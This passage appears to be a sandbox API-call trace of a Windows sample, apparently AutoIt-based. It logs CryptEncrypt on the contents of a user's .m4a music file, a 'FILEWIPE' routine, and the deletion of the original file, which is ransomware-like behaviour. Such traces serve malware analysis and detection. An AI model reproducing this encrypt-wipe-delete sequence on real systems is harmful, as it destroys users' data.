lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.540] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da358, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da358*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.540] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.541] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.541] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.541] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.541] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.541] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.541] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.541] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.541] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0037.543] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.543] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x275a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x2760) returned 1 [0037.543] CharLowerBuffW (in: lpsz="byte[10081]", cchLength=0xb | out: lpsz="byte[10081]") returned 0xb [0037.544] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.544] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.544] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac7650*, pdwDataLen=0x6ae220*=0x275a, dwBufLen=0x2760 | out: pbData=0xac7650*, pdwDataLen=0x6ae220*=0x2760) returned 1 [0037.544] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0037.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.546] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.546] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.546] CryptDestroyKey (hKey=0x7c2200) returned 1 [0037.546] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.546] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.546] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.546] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.546] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.547] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.547] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.547] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.547] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.547] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.548] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.548] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ecded0, ftCreationTime.dwHighDateTime=0x1d5b6a5, ftLastAccessTime.dwLowDateTime=0xe0ac2d80, ftLastAccessTime.dwHighDateTime=0x1d5b812, ftLastWriteTime.dwLowDateTime=0xe0ac2d80, ftLastWriteTime.dwHighDateTime=0x1d5b812, nFileSizeHigh=0x0, nFileSizeLow=0x275a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6VvYzvePP1.m4a", cAlternateFileName="6VVYZV~1.M4A")) returned 0x7c2240 [0037.549] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.549] CharLowerBuffW (in: lpsz="byte[10074]", cchLength=0xb | out: lpsz="byte[10074]") returned 0xb [0037.549] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.549] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.549] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.549] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.550] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.551] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.551] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6vvyzvepp1.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0037.551] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.551] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.551] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.551] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.552] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.552] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.552] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.552] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a", lpFilePart=0x0) returned 0x32 [0037.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ecded0, ftCreationTime.dwHighDateTime=0x1d5b6a5, ftLastAccessTime.dwLowDateTime=0xe0ac2d80, ftLastAccessTime.dwHighDateTime=0x1d5b812, ftLastWriteTime.dwLowDateTime=0x16169220, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x275a, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="6VvYzvePP1.m4a", cAlternateFileName="6VVYZV~1.M4A")) returned 0x7c2240 [0037.552] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6vvyzvepp1.m4a")) returned 1 [0037.553] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ecded0, ftCreationTime.dwHighDateTime=0x1d5b6a5, ftLastAccessTime.dwLowDateTime=0xe0ac2d80, ftLastAccessTime.dwHighDateTime=0x1d5b812, ftLastWriteTime.dwLowDateTime=0x16169220, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x275a, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="6VvYzvePP1.m4a", cAlternateFileName="6VVYZV~1.M4A")) returned 0 [0037.553] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.553] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.553] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.553] 